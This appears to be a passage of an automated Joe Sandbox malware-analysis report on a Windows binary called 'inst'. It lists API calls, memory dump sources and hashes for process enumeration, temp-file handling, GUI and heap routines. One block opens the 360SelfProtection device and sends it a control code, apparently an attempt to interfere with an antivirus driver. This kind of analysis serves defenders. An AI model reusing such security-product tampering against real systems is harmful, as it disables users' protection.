                                                                                                                                                                                                                      • CreateFileW.KERNEL32 ref: 00A7E0AA
                                                                                                                                                                                                                      • DeviceIoControl.KERNEL32(00000000,0022204C,00000000,00000004,00000000,00000004,00000000,00000000), ref: 00A7E0DA
                                                                                                                                                                                                                      • CloseHandle.KERNEL32(00000000), ref: 00A7E0E3
                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 0000000F.00000002.2571589051.0000000000A71000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00A70000, based on PE: true
                                                                                                                                                                                                                      • Associated: 0000000F.00000002.2571457677.0000000000A70000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 0000000F.00000002.2571976270.0000000000B2E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 0000000F.00000002.2572066890.0000000000B53000.00000008.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 0000000F.00000002.2572244179.0000000000B56000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 0000000F.00000002.2572331345.0000000000B60000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 0000000F.00000002.2572331345.0000000000E4D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_15_2_a70000_inst.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: CloseControlCreateCurrentDeviceFileHandleProcess
                                                                                                                                                                                                                      • String ID: \\.\360SelfProtection
                                                                                                                                                                                                                      • API String ID: 3778458602-936859468
                                                                                                                                                                                                                      • Opcode ID: 2a78c675092f24b2e70723fe97d23724bcf534d0268a6c6d54f6cbce2b61545f
                                                                                                                                                                                                                      • Instruction ID: 3d798237693c9129ab5233c35a32f9f97753679cb4af50acfff9e663d60fa46d
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 2a78c675092f24b2e70723fe97d23724bcf534d0268a6c6d54f6cbce2b61545f
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: A0F0A4327443107BE221DB64EC06FAE77A4AB88F21F444618FB94E71D0D7B49609C7AB
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      • __EH_prolog3.LIBCMT ref: 00AC1A49
                                                                                                                                                                                                                      • IsWindowEnabled.USER32(?), ref: 00AC1A5E
                                                                                                                                                                                                                      • GetClientRect.USER32(?,?), ref: 00AC1A91
                                                                                                                                                                                                                      • GetWindowTextW.USER32(?,00000000,00000080), ref: 00AC1AD7
                                                                                                                                                                                                                      • IsWindowEnabled.USER32(?), ref: 00AC1B05
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 0000000F.00000002.2571589051.0000000000A71000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00A70000, based on PE: true
                                                                                                                                                                                                                      • Associated: 0000000F.00000002.2571457677.0000000000A70000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 0000000F.00000002.2571976270.0000000000B2E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 0000000F.00000002.2572066890.0000000000B53000.00000008.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 0000000F.00000002.2572244179.0000000000B56000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 0000000F.00000002.2572331345.0000000000B60000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 0000000F.00000002.2572331345.0000000000E4D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_15_2_a70000_inst.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: Window$Enabled$ClientH_prolog3RectText
                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                      • API String ID: 968978764-0
                                                                                                                                                                                                                      • Opcode ID: 45b73c632c2f13745c5e5f53eb7f9b5e11c2bea5e7d797d5c8793c3f267054ba
                                                                                                                                                                                                                      • Instruction ID: 1ee25eb2215f2bb28739830ddd8310fcb0652aa62daca6004901d27fd416c9c9
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 45b73c632c2f13745c5e5f53eb7f9b5e11c2bea5e7d797d5c8793c3f267054ba
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 5C419C71A00609AFDB21DBA4CD40FFEBBF8FF44344F00442AF516A6191DB71AA41CB20
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      • __EH_prolog3.LIBCMT ref: 00AC1D0F
                                                                                                                                                                                                                      • GetWindowTextW.USER32(?,00000000,00000064), ref: 00AC1D4E
                                                                                                                                                                                                                        • Part of subcall function 00A8D354: _wcsnlen.LIBCMT ref: 00A8D36B
                                                                                                                                                                                                                      • GetClientRect.USER32(?,?), ref: 00AC1D8B
                                                                                                                                                                                                                      • IsWindowEnabled.USER32(?), ref: 00AC1DCE
                                                                                                                                                                                                                      • OffsetRect.USER32(?,00000001,00000001), ref: 00AC1DEC
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 0000000F.00000002.2571589051.0000000000A71000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00A70000, based on PE: true
                                                                                                                                                                                                                      • Associated: 0000000F.00000002.2571457677.0000000000A70000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 0000000F.00000002.2571976270.0000000000B2E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 0000000F.00000002.2572066890.0000000000B53000.00000008.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 0000000F.00000002.2572244179.0000000000B56000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 0000000F.00000002.2572331345.0000000000B60000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 0000000F.00000002.2572331345.0000000000E4D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_15_2_a70000_inst.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: RectWindow$ClientEnabledH_prolog3OffsetText_wcsnlen
                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                      • API String ID: 2890302191-0
                                                                                                                                                                                                                      • Opcode ID: 0b3e8f08e90f88a0677ead48c00d79ab27427eb59b7ea86d0108a8da2b39f756
                                                                                                                                                                                                                      • Instruction ID: 992173ad8d5946ff0c32fe376dbf67fa0bec712d6fcdbf9f94323bf757a0ca20
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 0b3e8f08e90f88a0677ead48c00d79ab27427eb59b7ea86d0108a8da2b39f756
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: DF4107B1D00619AFCF14DFA9CD85AEEBBF9FF48304F044519F616A6290DB71AA41CB60
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      • __EH_prolog3.LIBCMT ref: 00AC1E34
                                                                                                                                                                                                                      • GetWindowTextW.USER32(?,00000000,00000064), ref: 00AC1E5D
                                                                                                                                                                                                                        • Part of subcall function 00A8D354: _wcsnlen.LIBCMT ref: 00A8D36B
                                                                                                                                                                                                                      • GetDC.USER32(?), ref: 00AC1E70
                                                                                                                                                                                                                      • GetWindowRect.USER32(?,?), ref: 00AC1E8B
                                                                                                                                                                                                                      • SetWindowPos.USER32(?,00000000,00000000,00000000,?,?,00000006), ref: 00AC1EFC
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 0000000F.00000002.2571589051.0000000000A71000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00A70000, based on PE: true
                                                                                                                                                                                                                      • Associated: 0000000F.00000002.2571457677.0000000000A70000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 0000000F.00000002.2571976270.0000000000B2E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 0000000F.00000002.2572066890.0000000000B53000.00000008.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 0000000F.00000002.2572244179.0000000000B56000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 0000000F.00000002.2572331345.0000000000B60000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 0000000F.00000002.2572331345.0000000000E4D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_15_2_a70000_inst.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: Window$H_prolog3RectText_wcsnlen
                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                      • API String ID: 1157584674-0
                                                                                                                                                                                                                      • Opcode ID: c8949aa70a5effafe1ecd21e1b4a43fee48598a8629066d56dea64a445e9d160
                                                                                                                                                                                                                      • Instruction ID: 49185b22942c034998cb2d548241f996fdc31309e2bc4d143087608d977d560c
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: c8949aa70a5effafe1ecd21e1b4a43fee48598a8629066d56dea64a445e9d160
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: EC312671900609AFCB24EFA5CD85DFFBBB9FF85300F10051AE622A6291DB71A945CB21
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      • CreateCompatibleDC.GDI32(?), ref: 00ADA58E
                                                                                                                                                                                                                      • SelectObject.GDI32(00000000,?), ref: 00ADA5B9
                                                                                                                                                                                                                      • BitBlt.GDI32(?,?,?,?,?,00000000,00000000,00000000,00CC0020), ref: 00ADA5D6
                                                                                                                                                                                                                      • SelectObject.GDI32(00000000,00000000), ref: 00ADA5DE
                                                                                                                                                                                                                      • DeleteDC.GDI32(00000000), ref: 00ADA5F3
                                                                                                                                                                                                                        • Part of subcall function 00ADA29F: GdipDrawImageRectI.GDIPLUS(?,00000000,?,?,?,?,?,?,00ADFC56,?,?,?,00000000,?,?), ref: 00ADA2C2
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 0000000F.00000002.2571589051.0000000000A71000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00A70000, based on PE: true
                                                                                                                                                                                                                      • Associated: 0000000F.00000002.2571457677.0000000000A70000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 0000000F.00000002.2571976270.0000000000B2E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 0000000F.00000002.2572066890.0000000000B53000.00000008.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 0000000F.00000002.2572244179.0000000000B56000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 0000000F.00000002.2572331345.0000000000B60000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 0000000F.00000002.2572331345.0000000000E4D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_15_2_a70000_inst.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: ObjectSelect$CompatibleCreateDeleteDrawGdipImageRect
                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                      • API String ID: 240731188-0
                                                                                                                                                                                                                      • Opcode ID: 5c5965351c1dc1c4032b8aacb75bdc7b2d1bf5414a912575c0d5ef05cbec7b12
                                                                                                                                                                                                                      • Instruction ID: 8518cf3ed6807727fefb6536aaa25b66bf56122c8b202316aa2ca023a9725ab7
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 5c5965351c1dc1c4032b8aacb75bdc7b2d1bf5414a912575c0d5ef05cbec7b12
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: F521FA31500209EBCF21EF90DD41EAE7BB6FF64300F10455AF912A62A1DB71EA66EB51
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      • _memset.LIBCMT ref: 00A9DE07
                                                                                                                                                                                                                      • _memset.LIBCMT ref: 00A9DE1E
                                                                                                                                                                                                                      • _wcslen.LIBCMT ref: 00A9DE38
                                                                                                                                                                                                                      • _wcslen.LIBCMT ref: 00A9DE48
                                                                                                                                                                                                                      • SHFileOperationW.SHELL32(?,?,?,?,?,?,?,00ADE664,00000000,00000000,00ADE844,?,00000000,00ADE844,?,?), ref: 00A9DE6A
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 0000000F.00000002.2571589051.0000000000A71000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00A70000, based on PE: true
                                                                                                                                                                                                                      • Associated: 0000000F.00000002.2571457677.0000000000A70000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 0000000F.00000002.2571976270.0000000000B2E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 0000000F.00000002.2572066890.0000000000B53000.00000008.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 0000000F.00000002.2572244179.0000000000B56000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 0000000F.00000002.2572331345.0000000000B60000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 0000000F.00000002.2572331345.0000000000E4D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_15_2_a70000_inst.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: _memset_wcslen$FileOperation
                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                      • API String ID: 1469800647-0
                                                                                                                                                                                                                      • Opcode ID: 55ac6257925e1909cc4467abb62efda831668ffb0405acae67e1f3125b629fdf
                                                                                                                                                                                                                      • Instruction ID: 81b0e57993af96c12a7b08379123b05109c0b24e78354be866519c993506478f
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 55ac6257925e1909cc4467abb62efda831668ffb0405acae67e1f3125b629fdf
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 18112E71A1026D9ADF61EFF8DC49BFE73A8BF08700F540429B619E7141EB7496088B15
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 00ADD400
                                                                                                                                                                                                                      • Process32FirstW.KERNEL32(00000000,?), ref: 00ADD422
                                                                                                                                                                                                                      • CloseHandle.KERNEL32(00000000,00000002,00000000), ref: 00ADD42C
                                                                                                                                                                                                                      • Process32NextW.KERNEL32(00000000,0000022C), ref: 00ADD447
                                                                                                                                                                                                                      • CloseHandle.KERNEL32(00000000,00000002,00000000), ref: 00ADD45B
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 0000000F.00000002.2571589051.0000000000A71000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00A70000, based on PE: true
                                                                                                                                                                                                                      • Associated: 0000000F.00000002.2571457677.0000000000A70000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 0000000F.00000002.2571976270.0000000000B2E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 0000000F.00000002.2572066890.0000000000B53000.00000008.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 0000000F.00000002.2572244179.0000000000B56000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 0000000F.00000002.2572331345.0000000000B60000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 0000000F.00000002.2572331345.0000000000E4D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_15_2_a70000_inst.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: CloseHandleProcess32$CreateFirstNextSnapshotToolhelp32
                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                      • API String ID: 1789362936-0
                                                                                                                                                                                                                      • Opcode ID: 80903a45c124e11edacd73d6558fc542eda39dbc36331e7205cfe80d47ee9063
                                                                                                                                                                                                                      • Instruction ID: 2350cfc0d942bbd2b009e30878841cf925870575fc46cb4dee6371a31248174e
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 80903a45c124e11edacd73d6558fc542eda39dbc36331e7205cfe80d47ee9063
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: FC118471511114EFD720AF75CD89BBE73F8EB55321F50086AE856D7280DB34AE41CB21
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      • _memset.LIBCMT ref: 00ADE069
                                                                                                                                                                                                                      • GetTempPathW.KERNEL32(00000104,?,00B5CDA4,?,?), ref: 00ADE07D
                                                                                                                                                                                                                      • _memset.LIBCMT ref: 00ADE08D
                                                                                                                                                                                                                      • GetTempFileNameW.KERNEL32(?,00AA85B6,00000000,?,?,?,?,?,?,?), ref: 00ADE0A6
                                                                                                                                                                                                                      • DeleteFileW.KERNEL32(?,?,?,?,?,?,?), ref: 00ADE0B3
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 0000000F.00000002.2571589051.0000000000A71000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00A70000, based on PE: true
                                                                                                                                                                                                                      • Associated: 0000000F.00000002.2571457677.0000000000A70000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 0000000F.00000002.2571976270.0000000000B2E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 0000000F.00000002.2572066890.0000000000B53000.00000008.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 0000000F.00000002.2572244179.0000000000B56000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 0000000F.00000002.2572331345.0000000000B60000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 0000000F.00000002.2572331345.0000000000E4D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_15_2_a70000_inst.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: FileTemp_memset$DeleteNamePath
                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                      • API String ID: 433304728-0
                                                                                                                                                                                                                      • Opcode ID: 7ab47a50f8227b9dfe01f7ce51b187ce731639cf506018fd726a311e2f267e0d
                                                                                                                                                                                                                      • Instruction ID: de64a8f8502316cd918df57b70c1725a1d0b112a024466815988c46df6fdfeea
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 7ab47a50f8227b9dfe01f7ce51b187ce731639cf506018fd726a311e2f267e0d
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: F411C8F6A0021CABCB10DB94EC49FEE73BCEB48305F1040B5B715E3141EA30AB488BA4
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                        • Part of subcall function 00ABB670: DeleteObject.GDI32(?), ref: 00ABB68C
                                                                                                                                                                                                                      • GetModuleHandleW.KERNEL32(?), ref: 00ABEC97
                                                                                                                                                                                                                      • FindResourceW.KERNEL32(?,?,?), ref: 00ABECA8
                                                                                                                                                                                                                      • SizeofResource.KERNEL32(?,00000000), ref: 00ABECB7
                                                                                                                                                                                                                      • LoadResource.KERNEL32(?,00000000), ref: 00ABECC1
                                                                                                                                                                                                                      • LockResource.KERNEL32(00000000), ref: 00ABECC8
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 0000000F.00000002.2571589051.0000000000A71000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00A70000, based on PE: true
                                                                                                                                                                                                                      • Associated: 0000000F.00000002.2571457677.0000000000A70000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 0000000F.00000002.2571976270.0000000000B2E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 0000000F.00000002.2572066890.0000000000B53000.00000008.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 0000000F.00000002.2572244179.0000000000B56000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 0000000F.00000002.2572331345.0000000000B60000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 0000000F.00000002.2572331345.0000000000E4D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_15_2_a70000_inst.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: Resource$DeleteFindHandleLoadLockModuleObjectSizeof
                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                      • API String ID: 2239502561-0
                                                                                                                                                                                                                      • Opcode ID: ad1ee3caa513b42a4a13c4f177ced15e59cea7f73d5662500d8a4cf221234e7b
                                                                                                                                                                                                                      • Instruction ID: 574fe1c748ec66c8d8c0b5d6f1e051facfa59f4adea7e1c3df8d2215eebce2bd
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: ad1ee3caa513b42a4a13c4f177ced15e59cea7f73d5662500d8a4cf221234e7b
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: BE016D32900214BFDB22DBA69D08DEF7BACEF457517104419F805D7211DA34DD51D6A4
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      • __lock.LIBCMT ref: 00AF4A1A
                                                                                                                                                                                                                        • Part of subcall function 00B0339F: __mtinitlocknum.LIBCMT ref: 00B033B5
                                                                                                                                                                                                                        • Part of subcall function 00B0339F: __amsg_exit.LIBCMT ref: 00B033C1
                                                                                                                                                                                                                        • Part of subcall function 00B0339F: EnterCriticalSection.KERNEL32(?,?,?,00B04EDB,0000000D,00B4EFE8,00000008,00AFEA68,?,00000000), ref: 00B033C9
                                                                                                                                                                                                                      • ___sbh_find_block.LIBCMT ref: 00AF4A25
                                                                                                                                                                                                                      • ___sbh_free_block.LIBCMT ref: 00AF4A34
                                                                                                                                                                                                                      • RtlFreeHeap.NTDLL(00000000,?,00B4E890,0000000C,00B04E21,00000000,?,00B005A7,?,00000001,?,?,00B03329,00000018,00B4EF60,0000000C), ref: 00AF4A64
                                                                                                                                                                                                                      • GetLastError.KERNEL32(?,00B005A7,?,00000001,?,?,00B03329,00000018,00B4EF60,0000000C,00B033BA,?,?,?,00B04EDB,0000000D), ref: 00AF4A75
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 0000000F.00000002.2571589051.0000000000A71000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00A70000, based on PE: true
                                                                                                                                                                                                                      • Associated: 0000000F.00000002.2571457677.0000000000A70000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 0000000F.00000002.2571976270.0000000000B2E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 0000000F.00000002.2572066890.0000000000B53000.00000008.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 0000000F.00000002.2572244179.0000000000B56000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 0000000F.00000002.2572331345.0000000000B60000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 0000000F.00000002.2572331345.0000000000E4D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_15_2_a70000_inst.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: CriticalEnterErrorFreeHeapLastSection___sbh_find_block___sbh_free_block__amsg_exit__lock__mtinitlocknum
                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                      • API String ID: 2714421763-0
                                                                                                                                                                                                                      • Opcode ID: eb8c8cef69139fcfc5be9994f46d0ec083c348b140c71e985e29a5e4aa5ffa09
                                                                                                                                                                                                                      • Instruction ID: fe910bd0f0a789b942274556edb30e6a945f21e486dba361bc73f9281ec8e738
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: eb8c8cef69139fcfc5be9994f46d0ec083c348b140c71e985e29a5e4aa5ffa09
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: AF016271D41309AADB30BBF19D0AB7F3FE8AF057A1F104559F614A70D1DF3486408A99
                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 0000000F.00000002.2571589051.0000000000A71000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00A70000, based on PE: true
                                                                                                                                                                                                                      • Associated: 0000000F.00000002.2571457677.0000000000A70000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 0000000F.00000002.2571976270.0000000000B2E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 0000000F.00000002.2572066890.0000000000B53000.00000008.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 0000000F.00000002.2572244179.0000000000B56000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 0000000F.00000002.2572331345.0000000000B60000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 0000000F.00000002.2572331345.0000000000E4D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_15_2_a70000_inst.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: H_prolog3$_memset
                                                                                                                                                                                                                      • String ID: parent=
                                                                                                                                                                                                                      • API String ID: 1193784468-1815376381
                                                                                                                                                                                                                      • Opcode ID: 62dbecfed19a5feed211a38a014b555743b4631a9336f1aad24348f00459eff4
                                                                                                                                                                                                                      • Instruction ID: 2bf9efcc16a88ce7b8ac140456db97e347cda7f1f1dfc8dc8014231b46db5281
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 62dbecfed19a5feed211a38a014b555743b4631a9336f1aad24348f00459eff4
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 81619231A142059ADB24BBB4EE53ABD77B5AF40710F20411EF5166B2D2EF609845CB25
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 0000000F.00000002.2571589051.0000000000A71000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00A70000, based on PE: true
                                                                                                                                                                                                                      • Associated: 0000000F.00000002.2571457677.0000000000A70000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 0000000F.00000002.2571976270.0000000000B2E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 0000000F.00000002.2572066890.0000000000B53000.00000008.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 0000000F.00000002.2572244179.0000000000B56000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 0000000F.00000002.2572331345.0000000000B60000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 0000000F.00000002.2572331345.0000000000E4D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_15_2_a70000_inst.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: H_prolog3_
                                                                                                                                                                                                                      • String ID: A:\
                                                                                                                                                                                                                      • API String ID: 2427045233-3379428675
                                                                                                                                                                                                                      • Opcode ID: d4246ac553319d82ba6da70ba6768c2bc2ace31f576e420a9d224fc6ecf90af6
                                                                                                                                                                                                                      • Instruction ID: a274bc27851accbcf7c420fb524e56a50faea6e7db71506bf99b478d0538f74e
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: d4246ac553319d82ba6da70ba6768c2bc2ace31f576e420a9d224fc6ecf90af6
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 6A41D138A00512DADF3DEB28894AFBD77E1EF50301F56802DF582AB195DB20ADC2C781
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      • __EH_prolog3_GS.LIBCMT ref: 00AD021C
                                                                                                                                                                                                                      • GetDriveTypeW.KERNEL32(?,?,?,?,0000002C), ref: 00AD032D
